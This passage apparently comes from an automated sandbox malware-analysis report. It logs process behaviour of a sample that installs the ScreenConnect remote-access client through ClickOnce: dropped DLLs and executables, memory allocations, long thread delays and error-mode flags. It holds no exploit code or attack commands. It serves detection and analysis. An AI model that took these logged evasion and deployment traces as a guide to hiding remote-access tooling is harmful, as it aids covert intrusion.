                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: 2356D330000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: 2356ECD0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeMemory allocated: 1590000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeMemory allocated: 1B100000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeMemory allocated: B60000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeMemory allocated: 25D0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeMemory allocated: 2390000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeMemory allocated: 11D0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeMemory allocated: 1400000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeMemory allocated: 1340000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeMemory allocated: 6F0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeMemory allocated: 1A280000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeMemory allocated: 760000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeMemory allocated: 1A4E0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeWindow / User API: threadDelayed 796Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeWindow / User API: threadDelayed 3451Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeWindow / User API: threadDelayed 5068Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Users\user\Desktop\pzPO97QouM.exe TID: 1200Thread sleep count: 122 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\pzPO97QouM.exe TID: 1200Thread sleep time: -40000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6756Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 5520Thread sleep time: -172550s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 5520Thread sleep time: -253400s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6756Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\svchost.exe TID: 5544Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\svchost.exe TID: 6536Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe TID: 6588Thread sleep time: -922337203685477s >= -30000sJump to behavior
